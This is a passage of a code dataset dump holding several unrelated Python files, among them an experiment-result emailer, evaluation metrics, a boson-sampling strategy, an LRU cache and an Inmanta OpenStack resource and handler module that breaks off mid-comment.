mgd_df.drop(mgd_df.filter(regex='134316').columns, axis=1, inplace=True)\n\nmgd_df.to_csv(\"step5_result.csv\", index=False)","sub_path":"step5_merge_t1_t2_tags.py","file_name":"step5_merge_t1_t2_tags.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"586419771","text":"import os\nimport sys\nimport StringIO\nimport smtplib\n\nold_stdout = sys.stdout # Memorize the default stdout stream\nbuffer = StringIO.StringIO()\n\ndef email_recipient(message):\n if not message:\n message = \"This message was empty\"\n \n # creates SMTP session \n s = smtplib.SMTP('smtp.gmail.com', 587) \n \n # start TLS for security \n s.starttls() \n \n # Authentication \n s.login(\"****\", \"****\") \n \n # sending the mail \n s.sendmail(\"experiment_results@lupalab.com\", \"sakbar@ncsu.edu\", message) \n \n # terminating the session \n s.quit() \n\ndef add_buffer_to_io():\n sys.stdout = buffer\n\ndef remove_buffer_from_io():\n sys.stdout = old_stdout\n buffer.close()\n\ndef update_user_by_email():\n experiment_data = buffer.getvalue() # Return a str containing the entire contents of the buffer.\n print(experiment_data) # Why not print it?\n email_recipient(experiment_data)\n\ndef run_experiment(exper):\n add_buffer_to_io()\n try:\n exper()\n except Exception as e:\n print(e)\n update_user_by_email()\n remove_buffer_from_io()","sub_path":"tan/update_user.py","file_name":"update_user.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"341683550","text":"import numpy as np\nimport matplotlib.pyplot as plt \n\nS = 1\nI1 = 5\nc = 3e8\nv0 = 3.0/656 * 10**17\nvd = np.sqrt(2 * 1.38 * 10**-23 * 10000/(1.7 * 10**-27) ) * v0 / c \nv = np.linspace(-5 * vd + v0, v0 + 5 * vd, num = 200)\nDp = 1/(np.sqrt(3.14)*vd) * np.exp(-((v - v0)/vd)**2)\nx = (v -v0) * 10**-14\n\nT = 10**10 * Dp\nu= np.arange(0, 1.2, 0.2)\nI = np.linspace(0, 0, 6)\n\ndef limb(u):\n I = S + np.exp(-T/u)*(I1-S)\n return I\n\n#for i in range(len(u)):\n # if i == 0:\n # I[0] = S\n # else:\n # y = limb(u[i])\n # I[i] = min(y)\n\n#print (u)\n#print (I)\n\n#plt.plot(u,I, '-g', label = \"Jedan mnogo kul grafik\")\n\nplt.plot(x, limb(1), '-b' )\nplt.plot(x, limb(0.5) , '-g')\nplt.show()\n","sub_path":"2015/AST1/vezbovni/Bozidar/limb.py","file_name":"limb.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"481416668","text":"\nimport os\nimport scipy\nimport pandas as pd\nfrom sentence_transformers import SentenceTransformer\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score\nfrom sklearn.metrics import classification_report\nfrom rouge import Rouge\nfrom statistics import mean\nimport nltk\nnltk.download('punkt')\nfrom nltk.translate.bleu_score import sentence_bleu, corpus_bleu\nfrom tqdm.notebook import tqdm\n\ncosine_model = SentenceTransformer('bert-base-nli-mean-tokens')\nrouge = Rouge()\n\n\n## Cosine Similarity\ndef cosine_similarity(actual_headlines, predicted_headlines):\n similarity = 0\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n actual_headline_embeddings = cosine_model.encode(actual_headline)\n predicted_headline_embeddings = cosine_model.encode(predicted_headline)\n similarity += 1 - scipy.spatial.distance.cdist([actual_headline_embeddings], 
[predicted_headline_embeddings], \"cosine\")[0]\n return similarity/(i+1)\n\n## Rouge-l Score\ndef rouge_score(actual_headlines, predicted_headlines):\n score = {'f':0, 'p':0, 'r':0}\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n rouge_score = rouge.get_scores(actual_headline, predicted_headline)\n rouge_scores = rouge_score[0]['rouge-l']\n for key in list('fpr'):\n score[key]+=rouge_scores[key]\n for key in list('fpr'):\n score[key]/=(i+1)\n return score\n\n## BLEU Score\ndef bleu_score(actual_headlines, predicted_headlines):\n bleu_score = 0\n for i, (actual_headline, predicted_headline) in enumerate(zip(actual_headlines, predicted_headlines)):\n hypothesis = predicted_headline.split()\n reference = actual_headline.split() \n references = [reference] # list of references for 1 sentence.\n list_of_references = [references] # list of references for all sentences in corpus.\n list_of_hypotheses = [hypothesis] # list of hypotheses that corresponds to list of references.\n bleu_score += corpus_bleu(list_of_references, list_of_hypotheses)\n return bleu_score/(i+1)","sub_path":"src/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"214725881","text":"__author__ = 'Tomasz Rybotycki'\n\nfrom typing import List\n\nfrom numpy import arange, ndarray\nfrom numpy.random import choice\nfrom scipy import special\n\nfrom src.BosonSamplingSimulator import BosonSamplingSimulator\nfrom src.simulation_strategies.FixedLossSimulationStrategy import FixedLossSimulationStrategy\nfrom src.simulation_strategies.SimulationStrategy import SimulationStrategy\n\n\nclass UniformLossSimulationStrategy(SimulationStrategy):\n def __init__(self, interferometer_matrix: ndarray, number_of_modes: int, probability_of_uniform_loss: float) \\\n -> None:\n self.interferometer_matrix = interferometer_matrix\n self.number_of_modes = number_of_modes\n self.probability_of_uniform_loss = probability_of_uniform_loss\n\n def simulate(self, input_state: ndarray) -> List[float]:\n initial_number_of_particles = int(sum(input_state))\n separable_states_weights = []\n\n # Using n, eta, l notation from the paper.\n n = initial_number_of_particles\n eta = self.probability_of_uniform_loss\n\n for number_of_particles_left in range(n + 1):\n l = number_of_particles_left\n separable_states_weights.append(pow(eta, l) * special.binom(n, l) * pow(1.0 - eta, n - l))\n\n number_of_particles_left_in_selected_separable_state = choice(arange(0, n + 1), p=separable_states_weights)\n\n strategy = FixedLossSimulationStrategy(self.interferometer_matrix,\n number_of_particles_left_in_selected_separable_state,\n self.number_of_modes)\n\n simulator = BosonSamplingSimulator(number_of_particles_left_in_selected_separable_state, n,\n self.number_of_modes, strategy)\n\n return simulator.get_classical_simulation_results()\n","sub_path":"src/simulation_strategies/UniformLossSimulationStrategy.py","file_name":"UniformLossSimulationStrategy.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"622220510","text":"import time\nimport threading\n\n\ndef calc_square(number):\n print(\"calculate square of numbers\")\n for n in number:\n time.sleep(0.2)\n print('Square: ', n * n)\n\n\ndef calc_cube(number):\n print(\"calculate cube of numbers\")\n for n in number:\n time.sleep(0.2)\n print('Cube: ', 
n * n * n)\n\n\narr = [2, 3, 8, 9]\nt = time.time()\nthread1 = threading.Thread(target=calc_square, args=(arr,))\nthread2 = threading.Thread(target=calc_cube, args=(arr,))\n\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()\n\nprint(\"done in : \", time.time() - t)\nprint(\"Ha... I am done with all my work now!\")\n","sub_path":"Multithreading.py","file_name":"Multithreading.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"23211795","text":"class LRUNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n self.prev = None\n\n\nclass LRUCache(object):\n\n def __init__(self, capacity):\n \"\"\"\n :type capacity: int\n \"\"\"\n self.capacity = capacity\n self.length = 0\n\n self.dic = {}\n self.nodes = {} # key\n self.head = LRUNode(None)\n self.tail = LRUNode(None)\n self.head.next = self.tail\n self.tail.prev = self.head\n\n\n def get(self, key):\n \"\"\"\n :type key: int\n :rtype: int\n \"\"\"\n if key in self.dic.keys():\n t = self.nodes[key]\n tp = t.prev\n tn = t.next\n tp.next = tn\n tn.prev = tp\n\n h = self.head.next\n self.head.next = t\n h.prev = t\n t.next = h\n t.prev = self.head\n\n return self.dic[key]\n else:\n return -1\n\n\n\n def put(self, key, value):\n \"\"\"\n :type key: int\n :type value: int\n :rtype: void\n \"\"\"\n\n if key in self.dic.keys():\n self.dic[key] = value\n t = self.nodes[key]\n tp = t.prev\n tn = t.next\n tp.next = tn\n tn.prev = tp\n\n h = self.head.next\n self.head.next = t\n h.prev = t\n t.next = h\n t.prev = self.head\n else:\n if self.length == self.capacity:\n d = self.tail.prev\n t = d.prev\n t.next = self.tail\n self.tail.prev = t\n self.dic.pop(d.val)\n self.nodes.pop(d.val)\n self.length -= 1\n\n self.dic[key] = value\n\n n = LRUNode(key)\n self.nodes[key] = n\n\n t = self.head.next\n self.head.next = n\n t.prev = n\n n.prev = self.head\n n.next = t\n self.length += 1\n\n def printList(self):\n p = self.head\n while p != None:\n print(p.val)\n p = p.next\n\nif __name__ == '__main__':\n cache = LRUCache(2)\n cache.put(2, 1)\n cache.put(1, 1)\n cache.put(2, 3)\n cache.put(4, 1)\n # print(cache.get(1))\n print(cache.get(1))\n print(cache.get(2))\n\n cache.printList()","sub_path":"LeetCode/A146.py","file_name":"A146.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"62086307","text":"\"\"\"\n Copyright 2017 Inmanta\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n Contact: code@inmanta.com\n\"\"\"\n\nimport os\nimport traceback\nimport logging\nimport time\nimport datetime\nimport math\n\nfrom inmanta.execute import proxy, util\nfrom inmanta.resources import resource, PurgeableResource, ManagedResource\nfrom inmanta import resources\nfrom inmanta.agent import handler\nfrom inmanta.agent.handler import provider, SkipResource, cache, ResourcePurged, CRUDHandler\nfrom inmanta.export import dependency_manager\nfrom inmanta.plugins import 
plugin\n\nfrom neutronclient.common import exceptions\nfrom neutronclient.neutron import client as neutron_client\n\nfrom novaclient import client as nova_client\nimport novaclient.exceptions\n\nfrom keystoneauth1.identity import v3\nfrom keystoneauth1 import session\nfrom keystoneclient.v3 import client as keystone_client\n\nfrom glanceclient import client as glance_client\n\ntry:\n    from keystoneclient.exceptions import NotFound\nexcept ImportError:\n    from keystoneclient.openstack.common.apiclient.exceptions import NotFound\n\n# silence a logger\nloud_logger = logging.getLogger(\"requests.packages.urllib3.connectionpool\")\nloud_logger.propagate = False\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nIMAGES = {}\n\n@plugin\ndef find_image(provider: \"openstack::Provider\", os: \"std::OS\", name: \"string\"=None) -> \"string\":\n    \"\"\"\n    Search for an image that matches the given operating system. This plugin uses\n    the os_distro and os_version tags of an image and the name and version attributes of\n    the OS parameter.\n\n    If multiple images match, the most recent image is returned.\n\n    :param provider: The provider to query for an image\n    :param os: The operating system and version (using os_distro and os_version metadata)\n    :param name: An optional string that the image name should contain\n    \"\"\"\n    global IMAGES\n    if provider.name not in IMAGES:\n        auth = v3.Password(auth_url=provider.connection_url, username=provider.username,\n                           password=provider.password, project_name=provider.tenant,\n                           user_domain_id=\"default\", project_domain_id=\"default\")\n        sess = session.Session(auth=auth)\n        client = glance_client.Client(\"2\", session=sess)\n\n        IMAGES[provider.name] = list(client.images.list())\n\n    selected = (datetime.datetime(1900, 1, 1), None)\n    for image in IMAGES[provider.name]:\n        # only images that are public\n        if (\"image_location\" not in image and image[\"visibility\"] == \"public\") and \\\n           (\"os_distro\" in image and \"os_version\" in image) and \\\n           (image[\"os_distro\"].lower() == os.name.lower() and image[\"os_version\"].lower() == str(os.version).lower()) and \\\n           (name is None or name in image[\"name\"]):\n            t = datetime.datetime.strptime(image[\"updated_at\"], \"%Y-%m-%dT%H:%M:%SZ\")\n            if t > selected[0]:\n                selected = (t, image)\n\n    if selected[1] is None or selected[1][\"id\"] is None:\n        raise Exception(\"No image found for os %s and version %s\" % (os.name, os.version))\n\n    return selected[1][\"id\"]\n\nFLAVORS = {}\n\n@plugin\ndef find_flavor(provider: \"openstack::Provider\", vcpus: \"number\", ram: \"number\", pinned: \"bool\"=False) -> \"string\":\n    \"\"\"\n    Find the flavor that matches the closest to the resources requested.\n\n    :param vcpus: The number of virtual cpus in the flavor\n    :param ram: The amount of ram in gigabytes\n    :param pinned: Whether the CPUs need to be pinned (#vcpu == #pcpu)\n    \"\"\"\n    global FLAVORS\n    if provider.name not in FLAVORS:\n        auth = v3.Password(auth_url=provider.connection_url, username=provider.username,\n                           password=provider.password, project_name=provider.tenant,\n                           user_domain_id=\"default\", project_domain_id=\"default\")\n        sess = session.Session(auth=auth)\n        client = nova_client.Client(\"2.1\", session=sess)\n\n        FLAVORS[provider.name] = list(client.flavors.list())\n\n    selected = (1000000, None)\n    for flavor in FLAVORS[provider.name]:\n        keys = flavor.get_keys()\n        is_pinned = \"hw:cpu_policy\" in keys and keys[\"hw:cpu_policy\"] == \"dedicated\"\n        if is_pinned ^ pinned:\n            continue\n\n        d_cpu = flavor.vcpus - vcpus\n        d_ram = (flavor.ram / 1024) 
- ram\n        distance = math.sqrt(math.pow(d_cpu, 2) + math.pow(d_ram, 2))\n        if d_cpu >= 0 and d_ram >= 0 and distance < selected[0]:\n            selected = (distance, flavor)\n\n    # fail explicitly when no flavor matched the constraints\n    if selected[1] is None:\n        raise Exception(\"No flavor found for %s vcpus and %s GB ram\" % (vcpus, ram))\n\n    return selected[1].name\n\n\nclass OpenstackResource(PurgeableResource, ManagedResource):\n    fields = (\"project\", \"admin_user\", \"admin_password\", \"admin_tenant\", \"auth_url\")\n\n    @staticmethod\n    def get_project(exporter, resource):\n        return resource.project.name\n\n    @staticmethod\n    def get_admin_user(exporter, resource):\n        return resource.provider.username\n\n    @staticmethod\n    def get_admin_password(exporter, resource):\n        return resource.provider.password\n\n    @staticmethod\n    def get_admin_tenant(exporter, resource):\n        return resource.provider.tenant\n\n    @staticmethod\n    def get_auth_url(exporter, resource):\n        return resource.provider.connection_url\n\n\n@resource(\"openstack::VirtualMachine\", agent=\"provider.name\", id_attribute=\"name\")\nclass VirtualMachine(OpenstackResource):\n    \"\"\"\n    A virtual machine managed by a hypervisor or IaaS\n    \"\"\"\n    fields = (\"name\", \"flavor\", \"image\", \"key_name\", \"user_data\", \"key_value\", \"ports\", \"security_groups\", \"config_drive\")\n\n    @staticmethod\n    def get_key_name(exporter, vm):\n        return vm.key_pair.name\n\n    @staticmethod\n    def get_key_value(exporter, vm):\n        return vm.key_pair.public_key\n\n    @staticmethod\n    def get_user_data(exporter, vm):\n        \"\"\"\n        Return an empty string when the user_data value is unknown\n        TODO: this is a hack\n        \"\"\"\n        try:\n            ua = vm.user_data\n        except proxy.UnknownException:\n            ua = \"\"\n        return ua\n\n    @staticmethod\n    def get_ports(_, vm):\n        ports = []\n        for p in vm.ports:\n            port = {\"name\": p.name, \"address\": None, \"network\": p.subnet.name, \"dhcp\": p.dhcp, \"index\": p.port_index}\n            try:\n                port[\"address\"] = p.address\n            except proxy.UnknownException:\n                pass\n            ports.append(port)\n\n        return ports\n\n    @staticmethod\n    def get_security_groups(_, vm):\n        return [v.name for v in vm.security_groups]\n\n\n@resource(\"openstack::Network\", agent=\"provider.name\", id_attribute=\"name\")\nclass Network(OpenstackResource):\n    \"\"\"\n    This class represents a network in neutron\n    \"\"\"\n    fields = (\"name\", \"external\", \"physical_network\", \"network_type\", \"segmentation_id\")\n\n\n@resource(\"openstack::Subnet\", agent=\"provider.name\", id_attribute=\"name\")\nclass Subnet(OpenstackResource):\n    \"\"\"\n    This class represents a subnet in neutron\n    \"\"\"\n    fields = (\"name\", \"network_address\", \"dhcp\", \"allocation_start\", \"allocation_end\", \"network\", \"dns_servers\")\n\n    @staticmethod\n    def get_network(_, subnet):\n        return subnet.network.name\n\n\n@resource(\"openstack::Router\", agent=\"provider.name\", id_attribute=\"name\")\nclass Router(OpenstackResource):\n    \"\"\"\n    This class represents a router in neutron\n    \"\"\"\n    fields = (\"name\", \"subnets\", \"gateway\", \"ports\", \"routes\")\n\n    @staticmethod\n    def get_gateway(_, router):\n        if hasattr(router.ext_gateway, \"name\"):\n            return router.ext_gateway.name\n\n        return \"\"\n\n    @staticmethod\n    def get_routes(_, router):\n        routes = {route.destination: route.nexthop for route in router.routes}\n        return routes\n\n    @staticmethod\n    def get_subnets(_, router):\n        return sorted([subnet.name for subnet in router.subnets])\n\n    @staticmethod\n    def get_ports(_, router):\n        return [p.name for p in router.ports]\n\n\n@resource(\"openstack::RouterPort\", agent=\"provider.name\", id_attribute=\"name\")\nclass RouterPort(OpenstackResource):\n    \"\"\"\n    A port in a router\n    \"\"\"\n    fields = 
(\"name\", \"address\", \"subnet\", \"router\", \"network\")\n\n @staticmethod\n def get_subnet(_, port):\n return port.subnet.name\n\n @staticmethod\n def get_network(_, port):\n return port.subnet.network.name\n\n @staticmethod\n def get_router(_, port):\n return port.router.name\n\n\n@resource(\"openstack::HostPort\", agent=\"provider.name\", id_attribute=\"name\")\nclass HostPort(OpenstackResource):\n \"\"\"\n A port in a router\n \"\"\"\n fields = (\"name\", \"address\", \"subnet\", \"host\", \"network\", \"portsecurity\", \"dhcp\", \"port_index\",\n \"retries\", \"wait\")\n\n @staticmethod\n def get_address(exporter, port):\n try:\n return port.address\n except proxy.UnknownException:\n return \"\"\n\n @staticmethod\n def get_subnet(_, port):\n return port.subnet.name\n\n @staticmethod\n def get_network(_, port):\n return port.subnet.network.name\n\n @staticmethod\n def get_host(_, port):\n return port.vm.name\n\n\n@resource(\"openstack::SecurityGroup\", agent=\"provider.name\", id_attribute=\"name\")\nclass SecurityGroup(OpenstackResource):\n \"\"\"\n A security group in an OpenStack tenant\n \"\"\"\n fields = (\"name\", \"description\", \"manage_all\", \"rules\", \"retries\", \"wait\")\n\n @staticmethod\n def get_rules(exporter, group):\n rules = []\n dedup = set()\n for rule in group.rules:\n json_rule = {\"protocol\": rule.ip_protocol,\n \"direction\": rule.direction}\n\n if rule.port > 0:\n json_rule[\"port_range_min\"] = rule.port\n json_rule[\"port_range_max\"] = rule.port\n\n else:\n json_rule[\"port_range_min\"] = rule.port_min\n json_rule[\"port_range_max\"] = rule.port_max\n\n if json_rule[\"port_range_min\"] == 0:\n json_rule[\"port_range_min\"] = None\n\n if json_rule[\"port_range_max\"] == 0:\n json_rule[\"port_range_max\"] = None\n\n try:\n json_rule[\"remote_ip_prefix\"] = rule.remote_prefix\n except Exception:\n pass\n\n try:\n json_rule[\"remote_group\"] = rule.remote_group.name\n except Exception:\n pass\n\n key = tuple(sorted(json_rule.items()))\n if key not in dedup:\n dedup.add(key)\n rules.append(json_rule)\n else:\n LOGGER.warning(\"A duplicate rule exists in security group %s\", group.name)\n\n return rules\n\n\n@resource(\"openstack::FloatingIP\", agent=\"provider.name\", id_attribute=\"name\")\nclass FloatingIP(OpenstackResource):\n \"\"\"\n A floating ip\n \"\"\"\n fields = (\"name\", \"port\", \"external_network\")\n\n @staticmethod\n def get_port(_, fip):\n return fip.port.name\n\n @staticmethod\n def get_external_network(_, fip):\n return fip.external_network.name\n\n\nclass KeystoneResource(PurgeableResource, ManagedResource):\n fields = (\"admin_token\", \"url\", \"admin_user\", \"admin_password\", \"admin_tenant\", \"auth_url\")\n\n @staticmethod\n def get_admin_token(_, resource):\n return resource.provider.token\n\n @staticmethod\n def get_url(_, resource):\n return os.path.join(resource.provider.admin_url, \"v2.0/\")\n\n @staticmethod\n def get_admin_user(exporter, resource):\n return resource.provider.username\n\n @staticmethod\n def get_admin_password(exporter, resource):\n return resource.provider.password\n\n @staticmethod\n def get_admin_tenant(exporter, resource):\n return resource.provider.tenant\n\n @staticmethod\n def get_auth_url(exporter, resource):\n return resource.provider.connection_url\n\n\n@resource(\"openstack::Project\", agent=\"provider.name\", id_attribute=\"name\")\nclass Project(KeystoneResource):\n \"\"\"\n This class represents a project in keystone\n \"\"\"\n fields = (\"name\", \"enabled\", \"description\")\n\n 
@staticmethod\n    def get_project(exporter, resource):\n        return resource.project.name\n\n\n@resource(\"openstack::User\", agent=\"provider.name\", id_attribute=\"name\")\nclass User(KeystoneResource):\n    \"\"\"\n    A user in keystone\n    \"\"\"\n    fields = (\"name\", \"email\", \"enabled\", \"password\")\n\n\n@resource(\"openstack::Role\", agent=\"provider.name\", id_attribute=\"role_id\")\nclass Role(KeystoneResource):\n    \"\"\"\n    A role that adds a user to a project\n    \"\"\"\n    fields = (\"role_id\", \"role\", \"project\", \"user\")\n\n    @staticmethod\n    def get_project(exporter, resource):\n        return resource.project.name\n\n    @staticmethod\n    def get_user(exporter, resource):\n        return resource.user.name\n\n\n@resource(\"openstack::Service\", agent=\"provider.name\", id_attribute=\"name\")\nclass Service(KeystoneResource):\n    \"\"\"\n    A service for which endpoints can be registered\n    \"\"\"\n    fields = (\"name\", \"type\", \"description\")\n\n\n@resource(\"openstack::EndPoint\", agent=\"provider.name\", id_attribute=\"service_id\")\nclass EndPoint(KeystoneResource):\n    \"\"\"\n    An endpoint for a service\n    \"\"\"\n    fields = (\"region\", \"internal_url\", \"public_url\", \"admin_url\", \"service_id\")\n\n\n@dependency_manager\ndef openstack_dependencies(config_model, resource_model):\n    projects = {}\n    networks = {}\n    routers = {}\n    subnets = {}\n    vms = {}\n    ports = {}\n    fips = {}\n    sgs = {}\n    router_map = {}\n\n    for _, res in resource_model.items():\n        if res.id.entity_type == \"openstack::Project\":\n            projects[res.name] = res\n\n        elif res.id.entity_type == \"openstack::Network\":\n            networks[res.name] = res\n\n        elif res.id.entity_type == \"openstack::Router\":\n            routers[res.name] = res\n\n        elif res.id.entity_type == \"openstack::Subnet\":\n            subnets[res.name] = res\n\n        elif res.id.entity_type == \"openstack::VirtualMachine\":\n            vms[res.name] = res\n\n        elif res.id.entity_type == \"openstack::HostPort\":\n            ports[res.name] = res\n\n        elif res.id.entity_type == \"openstack::FloatingIP\":\n            fips[res.name] = res\n\n        elif res.id.entity_type == \"openstack::SecurityGroup\":\n            sgs[res.name] = res\n\n    # they require the tenant to exist\n    for network in networks.values():\n        if network.model.project.name in projects:\n            network.requires.add(projects[network.model.project.name])\n\n    for router in routers.values():\n        if router.model.project.name in projects:\n            router.requires.add(projects[router.model.project.name])\n\n        # depend on the attached subnets\n        for subnet_name in router.subnets:\n            if subnet_name in subnets:\n                router.requires.add(subnets[subnet_name])\n\n            # create external/subnet mapping\n            router_map[(router.gateway, subnet_name)] = router\n\n        if router.gateway in networks:\n            router.requires.add(networks[router.gateway])\n\n    for subnet in subnets.values():\n        if subnet.model.project.name in projects:\n            subnet.requires.add(projects[subnet.model.project.name])\n\n        # also require the network it is attached to\n        if subnet.model.network.name in networks:\n            subnet.requires.add(networks[subnet.model.network.name])\n\n    for vm in vms.values():\n        if vm.model.project.name in projects:\n            vm.requires.add(projects[vm.model.project.name])\n\n        for port in vm.ports:\n            if port[\"network\"] in subnets:\n                vm.requires.add(subnets[port[\"network\"]])\n\n        for sg in vm.security_groups:\n            if sg in sgs:\n                vm.requires.add(sgs[sg])\n\n    for port in ports.values():\n        if port.model.project.name in projects:\n            port.requires.add(projects[port.model.project.name])\n\n        if port.network in subnets:\n            
port.requires.add(subnets[port.network])\n\n        if port.host in vms:\n            port.requires.add(vms[port.host])\n\n    for fip in fips.values():\n        if fip.external_network in networks:\n            fip.requires.add(networks[fip.external_network])\n\n        if fip.port in ports:\n            port = ports[fip.port]\n            fip.requires.add(port)\n\n            # find router on which this floating ip is added\n            key = (fip.external_network, port.subnet)\n            if key in router_map:\n                fip.requires.add(router_map[key])\n\n\nCRED_TIMEOUT = 600\nRESOURCE_TIMEOUT = 10\n\n\nclass OpenStackHandler(CRUDHandler):\n\n    @cache(timeout=CRED_TIMEOUT)\n    def get_session(self, auth_url, project, admin_user, admin_password):\n        auth = v3.Password(auth_url=auth_url, username=admin_user, password=admin_password, project_name=project,\n                           user_domain_id=\"default\", project_domain_id=\"default\")\n        sess = session.Session(auth=auth)\n        return sess\n\n    @cache(timeout=CRED_TIMEOUT)\n    def get_nova_client(self, auth_url, project, admin_user, admin_password):\n        return nova_client.Client(\"2.1\", session=self.get_session(auth_url, project, admin_user, admin_password))\n\n    @cache(timeout=CRED_TIMEOUT)\n    def get_neutron_client(self, auth_url, project, admin_user, admin_password):\n        return neutron_client.Client(\"2.0\", session=self.get_session(auth_url, project, admin_user, admin_password))\n\n    @cache(timeout=CRED_TIMEOUT)\n    def get_keystone_client(self, auth_url, project, admin_user, admin_password):\n        return keystone_client.Client(session=self.get_session(auth_url, project, admin_user, admin_password))\n\n    def pre(self, ctx, resource):\n        project = resource.admin_tenant\n        self._nova = self.get_nova_client(resource.auth_url, project, resource.admin_user, resource.admin_password)\n        self._neutron = self.get_neutron_client(resource.auth_url, project, resource.admin_user,\n                                                resource.admin_password)\n        self._keystone = self.get_keystone_client(resource.auth_url, project, resource.admin_user, resource.admin_password)\n\n    def post(self, ctx, resource):\n        self._nova = None\n        self._neutron = None\n        self._keystone = None\n\n    def get_project_id(self, resource, name):\n        \"\"\"\n        Retrieve the id of a project based on the given name\n        \"\"\"\n        # Fallback for non admin users: a scoped session can resolve its own project id\n        if resource.admin_tenant == name:\n            session = self.get_session(resource.auth_url, name, resource.admin_user, resource.admin_password)\n            return session.get_project_id()\n\n        project = self._keystone.projects.find(name=name)\n        return project.id\n\n    def get_network(self, project_id, name=None, network_id=None):\n        \"\"\"\n        Retrieve a network based on its name or id\n        \"\"\"\n        query = {}\n        if project_id is not None and network_id is None:\n            query[\"tenant_id\"] = project_id\n\n        if name is not None:\n            query[\"name\"] = name\n        elif network_id is not None:\n            query[\"id\"] = network_id\n        else:\n            raise Exception(\"Either a name or an id needs to be provided.\")\n\n        networks = self._neutron.list_networks(**query)\n        if len(networks[\"networks\"]) == 0:\n            return None\n\n        elif len(networks[\"networks\"]) > 1:\n            raise Exception(\"Found more than one network with name %s/id %s for project %s\" % (name, network_id, project_id))\n\n        else:\n            return networks[\"networks\"][0]\n\n    def get_subnet(self, project_id, name=None, subnet_id=None):\n        \"\"\"\n        Retrieve a subnet based on its name or id\n        \"\"\"\n        if name is not None:\n            subnets = self._neutron.list_subnets(tenant_id=project_id, name=name)\n        elif subnet_id is not None:\n            subnets = 
self._neutron.list_subnets(tenant_id=project_id, id=subnet_id)\n        else:\n            raise Exception(\"Either a name or an id needs to be provided.\")\n\n        if len(subnets[\"subnets\"]) == 0:\n            return None\n\n        elif len(subnets[\"subnets\"]) > 1:\n            raise Exception(\"Found more than one subnet with name %s for project %s\" % (name, project_id))\n\n        else:\n            return subnets[\"subnets\"][0]\n\n    def get_router(self, project_id=None, name=None, router_id=None):\n        \"\"\"\n        Retrieve a router based on its name or id\n        \"\"\"\n        query = {}\n        if project_id is not None:\n            query[\"tenant_id\"] = project_id\n\n        if name is not None:\n            query[\"name\"] = name\n        elif router_id is not None:\n            query[\"id\"] = router_id\n        else:\n            raise Exception(\"Either a name or an id needs to be provided.\")\n\n        routers = self._neutron.list_routers(**query)\n\n        if len(routers[\"routers\"]) == 0:\n            return None\n\n        elif len(routers[\"routers\"]) > 1:\n            raise Exception(\"Found more than one router with name %s for project %s\" % (name, project_id))\n\n        else:\n            return routers[\"routers\"][0]\n\n    def get_host_id(self, project_id, name):\n        return self.get_host(project_id, name).id\n\n    def get_host(self, project_id, name):\n        \"\"\"\n        Retrieve a VM based on its name\n        \"\"\"\n        vms = self._nova.servers.findall(name=name)\n\n        if len(vms) == 0:\n            return None\n\n        elif len(vms) > 1:\n            raise Exception(\"Found more than one VM with name %s for project %s\" % (name, project_id))\n\n        else:\n            return vms[0]\n\n    def get_host_for_id(self, server_id):\n        \"\"\"\n        Retrieve a VM based on its id\n        \"\"\"\n        vms = self._nova.servers.findall(id=server_id)\n\n        if len(vms) == 0:\n            return None\n\n        elif len(vms) > 1:\n            raise Exception(\"Found more than one VM with id %s\" % (server_id))\n\n        else:\n            return vms[0]\n\n    def get_security_group(self, ctx, name=None, group_id=None):\n        \"\"\"\n        Get security group details from openstack\n        \"\"\"\n        if name is not None:\n            sgs = self._neutron.list_security_groups(name=name)\n        elif group_id is not None:\n            sgs = self._neutron.list_security_groups(id=group_id)\n        else:\n            raise Exception(\"Either a name or an id needs to be provided.\")\n\n        if len(sgs[\"security_groups\"]) == 0:\n            return None\n        elif len(sgs[\"security_groups\"]) > 1:\n            ctx.warning(\"Multiple security groups with name %(name)s exist.\", name=name, groups=sgs[\"security_groups\"])\n\n        return sgs[\"security_groups\"][0]\n\n\n@provider(\"openstack::VirtualMachine\", name=\"openstack\")\nclass VirtualMachineHandler(OpenStackHandler):\n    @cache(timeout=10)\n    def get_vm(self, ctx, resource):\n        if resource.project == resource.admin_tenant:\n            servers = self._nova.servers.list(search_opts={\"name\": resource.name})\n        else:\n            try:\n                project_id = self.get_project_id(resource, resource.project)\n                servers = self._nova.servers.list(search_opts={\"all_tenants\": True, \"tenant_id\": project_id,\n                                                               \"name\": resource.name})\n            except Exception:\n                ctx.exception(\"Unable to retrieve server list with a scoped login on project %(admin_project)s, \"\n                              \"for project %(project)s. This only works with admin credentials.\",\n                              admin_project=resource.admin_tenant, project=resource.project, traceback=traceback.format_exc())\n                return None\n\n        # OS query semantics are not == but \"in\". 
